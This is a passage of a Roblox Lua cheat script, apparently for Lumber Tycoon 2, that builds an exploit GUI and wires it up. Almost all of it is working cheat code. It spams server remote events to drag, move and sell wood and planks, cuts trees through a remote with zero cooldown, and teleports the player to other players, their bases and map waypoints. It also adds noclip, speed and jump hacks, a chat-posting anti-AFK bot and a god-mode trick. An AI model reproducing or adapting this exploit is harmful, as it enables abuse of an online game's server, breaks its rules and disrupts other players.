  1804. Player6.BorderColor3 = Color3.new(0, 1, 0)
  1805. Player6.Position = UDim2.new(0, 5, 0, 165)
  1806. Player6.Size = UDim2.new(0, 160, 0, 20)
  1807. Player6.Font = Enum.Font.Fantasy
  1808. Player6.FontSize = Enum.FontSize.Size18
  1809. Player6.Text = ""
  1810. Player6.TextColor3 = Color3.new(1, 1, 1)
  1811. Player6.TextSize = 16
  1812. Player6.TextWrapped = true
  1813.  
  1814. TpPlayer.Name = "TpPlayer"
  1815. TpPlayer.Parent = PlayerFrame
  1816. TpPlayer.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1817. TpPlayer.BackgroundTransparency = 0
  1818. TpPlayer.BorderColor3 = Color3.new(0, 1, 0)
  1819. TpPlayer.Position = UDim2.new(0, 5, 0, 225)
  1820. TpPlayer.Size = UDim2.new(0, 75, 0, 35)
  1821. TpPlayer.Font = Enum.Font.Fantasy
  1822. TpPlayer.FontSize = Enum.FontSize.Size18
  1823. TpPlayer.Text = "Tp to Player"
  1824. TpPlayer.TextColor3 = Color3.new(1, 1, 1)
  1825. TpPlayer.TextScaled = true
  1826. TpPlayer.TextWrapped = true
  1827. TpPlayer.TextSize = 14
  1828.  
  1829. TpBase.Name = "TpBase"
  1830. TpBase.Parent = PlayerFrame
  1831. TpBase.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1832. TpBase.BackgroundTransparency = 0
  1833. TpBase.BorderColor3 = Color3.new(0, 1, 0)
  1834. TpBase.Position = UDim2.new(0, 90, 0, 225)
  1835. TpBase.Size = UDim2.new(0, 75, 0, 35)
  1836. TpBase.Font = Enum.Font.Fantasy
  1837. TpBase.FontSize = Enum.FontSize.Size18
  1838. TpBase.Text = "Tp to\nBase"
  1839. TpBase.TextColor3 = Color3.new(1, 1, 1)
  1840. TpPlayer.TextSize = 22
  1841.  
  1842. WalkSpeed.Name = "WalkSpeed"
  1843. WalkSpeed.Parent = MainFrame
  1844. WalkSpeed.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1845. WalkSpeed.TextColor3 = Color3.new(1, 1, 1)
  1846. WalkSpeed.BorderColor3 = Color3.new(0, 1, 0)
  1847. WalkSpeed.Position = UDim2.new(0, 155, 0, 340)
  1848. WalkSpeed.Size = UDim2.new(0, 45, 0, 20)
  1849. WalkSpeed.Font = Enum.Font.Fantasy
  1850. WalkSpeed.FontSize = Enum.FontSize.Size18
  1851. WalkSpeed.Text = "Walk"
  1852. WalkSpeed.TextSize = 17
  1853.  
  1854. WalkText.Name = "WalkText"
  1855. WalkText.Parent = MainFrame
  1856. WalkText.BackgroundColor3 = Color3.new(0, 0, 0)
  1857. WalkText.BorderColor3 = Color3.new(0, 1, 0)
  1858. WalkText.Position = UDim2.new(0, 205, 0, 340)
  1859. WalkText.Size = UDim2.new(0, 28, 0, 20)
  1860. WalkText.Font = Enum.Font.Fantasy
  1861. WalkText.FontSize = Enum.FontSize.Size18
  1862. WalkText.Text = "16"
  1863. WalkText.TextColor3 = Color3.new(1, 1, 1)
  1864. WalkText.TextSize = 17
  1865. WalkText.TextScaled = true
  1866.  
  1867. JumpPower.Name = "JumpPower"
  1868. JumpPower.Parent = MainFrame
  1869. JumpPower.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1870. JumpPower.TextColor3 = Color3.new(1, 1, 1)
  1871. JumpPower.BorderColor3 = Color3.new(0, 1, 0)
  1872. JumpPower.Position = UDim2.new(0, 243, 0, 340)
  1873. JumpPower.Size = UDim2.new(0, 49, 0, 20)
  1874. JumpPower.Font = Enum.Font.Fantasy
  1875. JumpPower.FontSize = Enum.FontSize.Size18
  1876. JumpPower.Text = "Jump"
  1877. JumpPower.TextSize = 17
  1878.  
  1879. JumpText.Name = "JumpText"
  1880. JumpText.Parent = MainFrame
  1881. JumpText.BackgroundColor3 = Color3.new(0, 0, 0)
  1882. JumpText.BorderColor3 = Color3.new(0, 1, 0)
  1883. JumpText.Position = UDim2.new(0, 297, 0, 340)
  1884. JumpText.Size = UDim2.new(0, 28, 0, 20)
  1885. JumpText.Font = Enum.Font.Fantasy
  1886. JumpText.FontSize = Enum.FontSize.Size18
  1887. JumpText.Text = "50"
  1888. JumpText.TextColor3 = Color3.new(1, 1, 1)
  1889. JumpText.TextSize = 17
  1890. JumpText.TextScaled = true
  1891.  
  1892. game.Lighting.Changed:connect(function()
  1893. game.Lighting.TimeOfDay = "12:00:00"
  1894. game.Lighting.FogEnd = 9999
  1895. game.Lighting.Brightness = 1
  1896. end)
  1897.  
  1898. --- Menus ---
  1899.  
  1900. local Menus = {
  1901. [BringTree] = BringTreeFrame;
  1902. [Waypoints] = WaypointFrame;
  1903. [Duper] = DupeFrame;
  1904. [TPPlanks] = PlankFrame;
  1905. [GoldAxe] = GoldAxeFrame;
  1906. [PlayerTp] = PlayerFrame;
  1907. [Greywood] = GreywoodFrame;
  1908. [GuiLabel] = LT2GUI2Frame;
  1909. [SellWoodPlanks] = SellFrame;
  1910. }
  1911. for button,frame in pairs(Menus) do
  1912. button.MouseButton1Click:connect(function()
  1913. if frame.Visible then
  1914. frame.Visible = false
  1915. return
  1916. end
  1917. for k,v in pairs(Menus) do
  1918. v.Visible = v == frame
  1919. end
  1920. end)
  1921. end
  1922.  
  1923. --- Open/Close ---
  1924.  
  1925. Open.MouseButton1Down:connect(function()
  1926. OpenFrame.Visible = false
  1927. MainFrame.Visible = true
  1928. end)
  1929.  
  1930. Minimize.MouseButton1Down:connect(function()
  1931. MainFrame.Visible = false
  1932. OpenFrame.Visible = true
  1933. end)
  1934.  
  1935. CloseLT2.MouseButton1Down:connect(function()
  1936. LT2CORE:destroy()
  1937. end)
  1938.  
  1939.  
  1940. local service = setmetatable({}, {
  1941. __index = function(t, k)
  1942. return game:GetService(k)
  1943. end
  1944. })
  1945.  
  1946. function Create(cls,props)
  1947. local inst = Instance.new(cls)
  1948. for i,v in pairs(props) do
  1949. inst[i] = v
  1950. end
  1951. return inst
  1952. end
  1953.  
  1954. --- TP Planks to you ---
  1955.  
  1956. checkplanks = false
  1957. local WoodPlanks={}
  1958. local ProcessedWoodList = LT2GUI.MainFrame.MenuFrame.PlankFrame.ProcessedWoodList
  1959.  
  1960. function UpdatePlanks()
  1961. local inc = 0
  1962. WoodPlanks={}
  1963. for i,v in pairs(game.Workspace.PlayerModels:GetChildren()) do
  1964. if v.Name=="Plank" and v.Owner.Value==game.Players.LocalPlayer then
  1965. if v:FindFirstChild("TreeClass") and WoodPlanks[v.TreeClass.Value] then
  1966. WoodPlanks[v.TreeClass.Value]=WoodPlanks[v.TreeClass.Value]
  1967. WoodPlanks[v.TreeClass.Value]["Wood"][v]=v
  1968. elseif v:FindFirstChild("TreeClass") then
  1969. WoodPlanks[v.TreeClass.Value]={Wood={v.WoodSection}}
  1970. end
  1971. end
  1972. end
  1973. end
  1974.  
  1975. function UpdateMovePlanks()
  1976. checkplanks = true
  1977. local inc=0
  1978. UpdatePlanks()
  1979. ProcessedWoodList:ClearAllChildren()
  1980. for i,v in pairs(WoodPlanks) do
  1981. ProcessedWoodList.CanvasSize=UDim2.new(0,0,0,25*inc)
  1982. local TPButton=Create("TextButton",{Parent=ProcessedWoodList,Size=UDim2.new(0,147,0,20),Position=UDim2.new(0,5,0,25*inc),Text=" "..i,ZIndex=3,BackgroundColor3 = Color3.new(0.2, 0.2, 0.2),Font = Enum.Font.Fantasy,TextColor3 = Color3.new(1, 1, 1),TextSize = 16,BorderColor3 = Color3.new(0, 1, 0)})
  1983. TPButton.MouseButton1Click:Connect(function()
  1984. sendNotice = game.ReplicatedStorage.Notices.SendUserNotice
  1985. sendNotice:Fire("Click where you want the Planks to TP to")
  1986. local ButtonPress
  1987. ButtonPress = game.Players.LocalPlayer:GetMouse().Button1Down:Connect(function()
  1988. Square = game.Players.LocalPlayer:GetMouse().Target
  1989. if (Square.Name == "OriginSquare" or Square.Name == "Square") then
  1990. ButtonPress:Disconnect()
  1991. for _, Plank in pairs(game.Workspace.PlayerModels:GetChildren()) do
  1992. if Plank.Name=="Plank" and Plank:FindFirstChild("TreeClass") then
  1993. if Plank.TreeClass.Value == i and Plank.Owner.Value == game.Players.LocalPlayer then
  1994. Plank:MoveTo(Square.Position)
  1995. for i=1,100 do
  1996. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Plank)
  1997. end
  1998. end
  1999. end
  2000. end
  2001. end
  2002. end)
  2003. end)
  2004. inc=inc+1
  2005. end
  2006. inc=0
  2007. end
  2008.  
  2009. TpAllPlanks.MouseButton1Click:Connect(function()
  2010. for _, Plank in pairs(game.Workspace.PlayerModels:GetChildren()) do
  2011. if Plank.Name=="Plank" and Plank:findFirstChild("Owner") then
  2012. if Plank.Owner.Value == game.Players.LocalPlayer then
  2013. sendNotice = game.ReplicatedStorage.Notices.SendUserNotice
  2014. sendNotice:Fire("Click where you want ALL the Planks to TP to")
  2015. local ButtonPress
  2016. ButtonPress = game.Players.LocalPlayer:GetMouse().Button1Down:Connect(function()
  2017. Square = game.Players.LocalPlayer:GetMouse().Target
  2018. if (Square.Name == "OriginSquare" or Square.Name == "Square") then
  2019. ButtonPress:Disconnect()
  2020. Plank:MoveTo(Square.Position)
  2021. for i=1,100 do
  2022. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Plank)
  2023. end
  2024. end
  2025. end)
  2026. end
  2027. end
  2028. end
  2029. end)
  2030.  
  2031. if not checkplanks then
  2032. UpdateMovePlanks()
  2033. end
  2034.  
  2035. game.Workspace.PlayerModels.ChildAdded:connect(function(Item)
  2036. if Item:FindFirstChild("Owner") and Item.Owner.Value == game.Players.LocalPlayer and Item:FindFirstChild("TreeClass") then
  2037. UpdateMovePlanks()
  2038. end
  2039. end)
  2040.  
  2041. game.Workspace.PlayerModels.ChildRemoved:connect(function(Item)
  2042. if Item:FindFirstChild("Owner") and Item.Owner.Value == game.Players.LocalPlayer and Item:FindFirstChild("TreeClass") then
  2043. UpdateMovePlanks()
  2044. end
  2045. end)
  2046.  
  2047. --- GuiInfo ---
  2048.  
  2049. GuiLabel.MouseButton1Down:connect(function()
  2050. if Lt2Info == "Info" then
  2051. Lt2Info = "Nothing"
  2052. GuiLabel.TextColor3 = Color3.new(1, 0, 1)
  2053. GuiLabel.BackgroundColor3 = Color3.new(0.1, 0.1, 0.1)
  2054. MenuLeftFrame.Active = true
  2055. MenuLeftFrame.Selectable = true
  2056. else
  2057. Lt2Info = "Info"
  2058. GuiLabel.TextColor3 = Color3.new(0, 1, 0)
  2059. GuiLabel.BackgroundColor3 = Color3.new(0.1, 0.1, 0.1)
  2060. MenuLeftFrame.Active = false
  2061. MenuLeftFrame.Selectable = false
  2062. end
  2063. end)
  2064.  
  2065. --- BringTreeInfo ---
  2066.  
  2067. BringTreeInfo1.MouseButton1Down:connect(function()
  2068. if BringTreeInfo1.Text == "Info" then
  2069. BringTreeInfo1.Text = "Close Info"
  2070. BringTreeInfo2.Visible = true
  2071. else
  2072. BringTreeInfo1.Text = "Info"
  2073. BringTreeInfo2.Visible = false
  2074. end
  2075. end)
  2076.  
  2077. --- Walkspeed/JumpPower ---
  2078.  
  2079. player = game.Players.LocalPlayer
  2080. Walk = 16
  2081. Jump = 50
  2082.  
  2083. WalkSpeed.MouseButton1Down:connect(function()
  2084. Walk = WalkText.Text
  2085. end)
  2086. JumpPower.MouseButton1Down:connect(function()
  2087. Jump = JumpText.Text
  2088. end)
  2089.  
  2090. player.Character.Humanoid.JumpPower = Jump
  2091. player.Character.Humanoid.WalkSpeed = Walk
  2092.  
  2093. player.Character.Humanoid.Changed:connect(function()
  2094. player.Character.Humanoid.JumpPower = Jump
  2095. player.Character.Humanoid.WalkSpeed = Walk
  2096. end)
  2097.  
  2098. --- Gold Axe ---
  2099.  
  2100. GoldAxeStart.MouseButton1Down:Connect(function()
  2101. GoldAxe.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2102. GoldAxeStart.Text = "Active"
  2103. Detect = coroutine.wrap(function()
  2104. Player = game.Players.LocalPlayer
  2105. mouse = Player:GetMouse()
  2106. mouse.Button1Down:connect(function()
  2107. MouseDown = true
  2108. end)
  2109. mouse.Button1Up:connect(function()
  2110. MouseDown = false
  2111. end)
  2112. end)
  2113. Detect()
  2114. Player = game.Players.LocalPlayer
  2115. mouse = Player:GetMouse()
  2116. game:GetService('RunService').RenderStepped:connect(function()
  2117. if Player.Character:FindFirstChild("Tool") then
  2118. if MouseDown == true then
  2119. if mouse.Target.Name == "WoodSection" then
  2120. targetWood = mouse.Target
  2121. Tool=Player.Character.Tool
  2122. ---FaceVector
  2123. Height = targetWood.CFrame:pointToObjectSpace(mouse.Hit.p).Y + targetWood.Size.Y/2
  2124. local ray = Ray.new(Player.Character.Head.Position, ((targetWood.CFrame * CFrame.new(0, Height - targetWood.Size.Y/2, 0)).p - Player.Character.Head.Position).unit * 200)
  2125. part,_,p = workspace:FindPartOnRay(ray, Player.Character)
  2126. function fixVector(V)
  2127. return Vector3.new(math.floor(V.X + 0.5), math.floor(V.Y + 0.5), math.floor(V.Z + 0.5))
  2128. end
  2129. local faceVector = fixVector(targetWood.CFrame:vectorToObjectSpace(p))
  2130. if faceVector.Y ~= 0 then
  2131. return
  2132. end
  2133. local lookAtCFrame = CFrame.new(Player.Character.Head.Position, mouse.Hit.p)
  2134. local relativeCFrame = lookAtCFrame:toObjectSpace(targetWood.CFrame * CFrame.Angles(math.pi/2, 0, 0))
  2135. local relativeLookVector = relativeCFrame.lookVector
  2136. local m = relativeLookVector.Y >= 0 and 1 or -1
  2137. if faceVector.X == 1 then
  2138. faceVector = Vector3.new(0, 0, -1) * m
  2139. elseif faceVector.X == -1 then
  2140. faceVector = Vector3.new(0, 0, 1) * m
  2141. elseif faceVector.Z == 1 then
  2142. faceVector = Vector3.new(1, 0, 0) * m
  2143. elseif faceVector.Z == -1 then
  2144. faceVector = Vector3.new(-1, 0, 0) * m
  2145. end
  2146. local cutEvent = targetWood.Parent.CutEvent
  2147. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(cutEvent, {sectionId = targetWood.ID.Value, faceVector = faceVector, height = Height, hitPoints = 0.2, cooldown = 0, cuttingClass = "Axe", tool = Player.Character.Tool})
  2148. end
  2149. end
  2150. end
  2151. end)
  2152. end)
  2153.  
  2154. --- Show Current Location
  2155.  
  2156. ShowLocation.MouseButton1Down:connect(function()
  2157.  
  2158. function round(num, numDecimalPlaces)
  2159. local mult = 10^(numDecimalPlaces or 0)
  2160. return math.floor(num * mult + 0.5) / mult
  2161. end
  2162.  
  2163. LocationX = round(game.Players.LocalPlayer.Character.HumanoidRootPart.Position.x, 1)
  2164. LocationY = round(game.Players.LocalPlayer.Character.HumanoidRootPart.Position.y, 1)
  2165. LocationZ = round(game.Players.LocalPlayer.Character.HumanoidRootPart.Position.z, 1)
  2166. ShowLocation.Text = "Current/Set Location\n"..LocationX..", "..LocationY..", "..LocationZ
  2167. CustomTPPoint.Text = "TP to "..LocationX..", "..LocationY..", "..LocationZ
  2168. CustomLocationSet = true
  2169. end)
  2170.  
  2171. --- TP to custom location ---
  2172.  
  2173. CustomTPPoint.MouseButton1Down:connect(function()
  2174. if CustomLocationSet == true then
  2175. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2176. uTorso.CFrame = CFrame.new(LocationX, LocationY, LocationZ)
  2177. end
  2178. end)
  2179.  
  2180. --- Player Tp ---
  2181.  
  2182. local buttons = {
  2183. Player1,
  2184. Player2,
  2185. Player3,
  2186. Player4,
  2187. Player5,
  2188. Player6
  2189. }
  2190. spawn(function()
  2191. while true do
  2192. Player1.Text = ""
  2193. Player2.Text = ""
  2194. Player3.Text = ""
  2195. Player4.Text = ""
  2196. Player5.Text = ""
  2197. Player6.Text = ""
  2198. for i, v in pairs(game.Players:GetChildren()) do
  2199. buttons[i].Text = v.Name
  2200. buttons[i].Visible = true
  2201. end
  2202. wait(0.5)
  2203. end
  2204. end)
  2205.  
  2206. Player1.MouseButton1Down:connect(function()
  2207. PlyrSel.Text = Player1.Text
  2208. end)
  2209. Player2.MouseButton1Down:connect(function()
  2210. PlyrSel.Text = Player2.Text
  2211. end)
  2212. Player3.MouseButton1Down:connect(function()
  2213. PlyrSel.Text = Player3.Text
  2214. end)
  2215. Player4.MouseButton1Down:connect(function()
  2216. PlyrSel.Text = Player4.Text
  2217. end)
  2218. Player5.MouseButton1Down:connect(function()
  2219. PlyrSel.Text = Player5.Text
  2220. end)
  2221. Player6.MouseButton1Down:connect(function()
  2222. PlyrSel.Text = Player6.Text
  2223. end)
  2224.  
  2225. TpPlayer.MouseButton1Down:connect(function()
  2226. if PlyrSel.Text == "SELECT A PLAYER" then
  2227. warn("No Player Selected")
  2228. else
  2229. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = workspace[PlyrSel.Text].HumanoidRootPart.CFrame
  2230. end
  2231. end)
  2232. TpBase.MouseButton1Down:connect(function()
  2233. for i, v in pairs(game.Workspace.Properties:GetChildren()) do
  2234. if v.Owner.Value == game.Players[PlyrSel.Text] then
  2235. local p= CFrame.new(v.OriginSquare.CFrame.x, v.OriginSquare.CFrame.y +3.5, v.OriginSquare.CFrame.z)
  2236. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = p
  2237. end
  2238. end
  2239. end)
  2240.  
  2241. --- NoClip ---
  2242.  
  2243. noclip = false
  2244. game:GetService('RunService').Stepped:connect(function()
  2245. if noclip then
  2246. game.Players.LocalPlayer.Character.Humanoid:ChangeState(11)
  2247. end
  2248. end)
  2249. NoClip.MouseButton1Down:connect(function()
  2250. noclip = not noclip
  2251. if NoClip.Text == "Enable NoClip" then
  2252. NoClip.Text = "Disable NoClip"
  2253. NoClip.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2254. else
  2255. NoClip.Text = "Enable NoClip"
  2256. NoClip.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2257. end
  2258. end)
  2259.  
  2260. --- Waypoints ---
  2261.  
  2262. local WayPoints = {
  2263. ["Wood R Us"] = CFrame.new(265, 5, 57),
  2264. ["SpawnPoint"] = CFrame.new(155, 5, 74),
  2265. ["Land Store"] = CFrame.new(258, 5, -99),
  2266. ["Link's Logic"] = CFrame.new(4607, 9, -798),
  2267. ["Cave"] = CFrame.new(3581, -177, 430),
  2268. ["Volcano"] = CFrame.new(-1585, 625, 1140),
  2269. ["Swamp"] = CFrame.new(-1209, 138, -801),
  2270. ["Palm Island"] = CFrame.new(2549, 5, -42),
  2271. ["Fancy Furnishings"] = CFrame.new(491, 13, -1720),
  2272. ["Boxed Cars"] = CFrame.new(509, 5.2, -1463),
  2273. ["Fine Arts Shop"] = CFrame.new(5207, -156, 719),
  2274. ["Bob's Shack"] = CFrame.new(260, 10, -2542),
  2275. ["Dock"] = CFrame.new(1114, 3.2, -197),
  2276. ["Bridge"] = CFrame.new(113, 15, -977),
  2277. ["End Times"] = CFrame.new(113, -204, -951),
  2278. ["Shrine Of Sight"] = CFrame.new(-1600, 205, 919),
  2279. ["The Den"] = CFrame.new(323, 49, 1930),
  2280. ["Volcano Win"] = CFrame.new(-1675, 358, 1476),
  2281. ["Ski Lodge"] = CFrame.new(1244, 66, 2306),
  2282. ["Strange Man"] = CFrame.new(1061, 20, 1131)
  2283. }
  2284.  
  2285. WoodRUs.MouseButton1Down:connect(function()
  2286. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2287. uTorso.CFrame = WayPoints["Wood R Us"]
  2288. end)
  2289.  
  2290. SpawnPoint.MouseButton1Down:connect(function()
  2291. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2292. uTorso.CFrame = WayPoints["SpawnPoint"]
  2293. end)
  2294.  
  2295. LandStore.MouseButton1Down:connect(function()
  2296. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2297. uTorso.CFrame = WayPoints["Land Store"]
  2298. end)
  2299.  
  2300. LinksLogic.MouseButton1Down:connect(function()
  2301. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2302. uTorso.CFrame = WayPoints["Link's Logic"]
  2303. end)
  2304.  
  2305. Cave.MouseButton1Down:connect(function()
  2306. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2307. uTorso.CFrame = WayPoints["Cave"]
  2308. end)
  2309.  
  2310. Volcano.MouseButton1Down:connect(function()
  2311. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2312. uTorso.CFrame = WayPoints["Volcano"]
  2313. end)
  2314.  
  2315. Swamp.MouseButton1Down:connect(function()
  2316. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2317. uTorso.CFrame = WayPoints["Swamp"]
  2318. end)
  2319.  
  2320. PalmIsland.MouseButton1Down:connect(function()
  2321. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2322. uTorso.CFrame = WayPoints["Palm Island"]
  2323. end)
  2324.  
  2325. FancyFurnishings.MouseButton1Down:connect(function()
  2326. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2327. uTorso.CFrame = WayPoints["Fancy Furnishings"]
  2328. end)
  2329.  
  2330. BoxedCars.MouseButton1Down:connect(function()
  2331. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2332. uTorso.CFrame = WayPoints["Boxed Cars"]
  2333. end)
  2334.  
  2335. FineArtsShop.MouseButton1Down:connect(function()
  2336. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2337. uTorso.CFrame = WayPoints["Fine Arts Shop"]
  2338. end)
  2339.  
  2340. BobsShack.MouseButton1Down:connect(function()
  2341. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2342. uTorso.CFrame = WayPoints["Bob's Shack"]
  2343. end)
  2344.  
  2345. Dock.MouseButton1Down:connect(function()
  2346. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2347. uTorso.CFrame = WayPoints["Dock"]
  2348. end)
  2349.  
  2350. Bridge.MouseButton1Down:connect(function()
  2351. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2352. uTorso.CFrame = WayPoints["Bridge"]
  2353. end)
  2354.  
  2355. EndTimes.MouseButton1Down:connect(function()
  2356. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2357. uTorso.CFrame = WayPoints["End Times"]
  2358. end)
  2359.  
  2360. ShrineOfSight.MouseButton1Down:connect(function()
  2361. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2362. uTorso.CFrame = WayPoints["Shrine Of Sight"]
  2363. end)
  2364.  
  2365. TheDen.MouseButton1Down:connect(function()
  2366. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2367. uTorso.CFrame = WayPoints["The Den"]
  2368. end)
  2369.  
  2370. VolcanoWin.MouseButton1Down:connect(function()
  2371. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2372. uTorso.CFrame = WayPoints["Volcano Win"]
  2373. end)
  2374.  
  2375. SkiLodge.MouseButton1Down:connect(function()
  2376. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2377. uTorso.CFrame = WayPoints["Ski Lodge"]
  2378. end)
  2379.  
  2380. StrangeMan.MouseButton1Down:connect(function()
  2381. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  2382. uTorso.CFrame = WayPoints["Strange Man"]
  2383. end)
  2384.  
  2385. --- Make Greywood ---
  2386.  
  2387. GreywoodStart.MouseButton1Down:Connect(function()
  2388. if GreyStart == "Nothing" then
  2389. GreyStart = "On"
  2390. GreywoodStart.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2391. GreywoodStart.Text = "Stop"
  2392. for i,v in next,workspace.PlayerModels:GetChildren() do
  2393. if v:FindFirstChild("Type") then
  2394. if v.Type.Value == "Blueprint" then
  2395. v.Type.Value = "Structure"
  2396. end
  2397. end
  2398. end
  2399. else
  2400. GreyStart = "Nothing"
  2401. GreywoodStart.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2402. GreywoodStart.Text = "Start"
  2403. for i,v in next,workspace.PlayerModels:GetChildren() do
  2404. if v:FindFirstChild("Type") then
  2405. if v.Type.Value == "Structure" then
  2406. v.Type.Value = "Blueprint"
  2407. end
  2408. end
  2409. end
  2410. end
  2411. end)
  2412.  
  2413. --- Anti AFK ---
  2414.  
  2415. AntiAFK.MouseButton1Down:Connect(function()
  2416. if afkactive == true then
  2417. afkactive = false
  2418. AntiAFK.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2419. AntiAFK.Text = "Start Anti-AFK Mode"
  2420. elseif afkactive == false then
  2421. afkactive = true
  2422. AntiAFK.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2423. AntiAFK.Text = "Stop Anti-AFK Mode"
  2424.  
  2425. logtime = coroutine.wrap(function()
  2426. afktotaltime=0
  2427. while afkactive == true do
  2428. wait(1)
  2429. afktotaltime=afktotaltime+1
  2430. AntiAFKtime.Text = "AFK for: "..afktotaltime.." Seconds"
  2431. end
  2432. end)
  2433.  
  2434. messageBot = coroutine.wrap(function()
  2435. while afkactive == true do
  2436. wait(300)
  2437. possiblechats = {"afk", "Away from keyboard", "I'm AFK"}
  2438. decide=math.random(1,#possiblechats)
  2439. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(possiblechats[decide], "All")
  2440. game.Players:Chat("/e point")
  2441. end
  2442. end)
  2443.  
  2444. moveChar = coroutine.wrap(function()
  2445. plr = game:service'Players'.LocalPlayer
  2446. char = plr.Character
  2447. hum = char:FindFirstChildOfClass'Humanoid'
  2448. while afkactive==true do
  2449. wait(1)
  2450. hum:Move(Vector3.new(1, 0, 0), false)
  2451. wait(1)
  2452. hum:Move(Vector3.new(-1, 0, 0), false)
  2453. wait(1)
  2454. hum:Move(Vector3.new(1, 0, 0), false)
  2455. wait(1)
  2456. hum:Move(Vector3.new(-1, 0, 0), false)
  2457. wait(1)
  2458. hum:Move(Vector3.new(0, 1, 0), false)
  2459. wait(1)
  2460. hum:Move(Vector3.new(0, 1, 0), false)
  2461. wait(60)
  2462. end
  2463. end)
  2464.  
  2465. logtime()
  2466. moveChar()
  2467. messageBot()
  2468. end
  2469. end)
  2470.  
  2471. --- Plot Tp ---
  2472.  
  2473. PlotTp.MouseButton1Down:connect(function()
  2474. for i,v in pairs(game.Workspace.Properties:GetChildren()) do
  2475. if v.Owner.Value == game.Players.LocalPlayer then
  2476. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = v.OriginSquare.CFrame + Vector3.new(0,10,0)
  2477. end
  2478. end
  2479. end)
  2480.  
  2481. ---TP Wood ---
  2482.  
  2483. TPWood.MouseButton1Click:Connect(function()
  2484. for _, Log in pairs(service.Workspace.LogModels:GetChildren()) do
  2485. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  2486. if Log.Owner.Value == service.Players.LocalPlayer then
  2487. Log:MoveTo(service.Players.LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(0, 20, 0))
  2488. for i=1,100 do
  2489. service.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log)
  2490. end
  2491. end
  2492. end
  2493. end
  2494. end)
  2495.  
  2496. --- Sell Wood ---
  2497.  
  2498. SellWood.MouseButton1Click:Connect(function()
  2499. for _, Log in pairs(service.Workspace.LogModels:GetChildren()) do
  2500. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  2501. if Log.Owner.Value == service.Players.LocalPlayer then
  2502. for i,v in pairs(Log:GetChildren()) do
  2503. if v.Name=="WoodSection" then
  2504. spawn(function()
  2505. for i=1,10 do
  2506. wait()
  2507. v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0)
  2508. end
  2509. end)
  2510. end
  2511. end
  2512. spawn(function()
  2513. for i=1,20 do
  2514. wait()
  2515. service.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log)
  2516. end
  2517. end)
  2518. end
  2519. end
  2520. end
  2521. end)
  2522.  
  2523. --- Sell Planks ---
  2524.  
  2525. SellPlanks.MouseButton1Click:Connect(function()
  2526. for _, Plank in pairs(service.Workspace.PlayerModels:GetChildren()) do
  2527. if Plank.Name=="Plank" and Plank:findFirstChild("Owner") then
  2528. if Plank.Owner.Value == service.Players.LocalPlayer then
  2529. for i,v in pairs(Plank:GetChildren()) do
  2530. if v.Name=="WoodSection" then
  2531. spawn(function()
  2532. for i=1,10 do
  2533. wait()
  2534. v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0)
  2535. end
  2536. end)
  2537. end
  2538. end
  2539. spawn(function()
  2540. for i=1,20 do
  2541. wait()
  2542. service.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Plank)
  2543. end
  2544. end)
  2545. end
  2546. end
  2547. end
  2548. end)
  2549.  
  2550. --- God Mode ---
  2551.  
  2552. GodMode.MouseButton1Click:Connect(function()
  2553. GodMode.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2554. game.Players.LocalPlayer.Character.Humanoid.Name = "1"
  2555. local l = game.Players.LocalPlayer.Character["1"]:Clone()
  2556. l.Parent = game.Players.LocalPlayer.Character
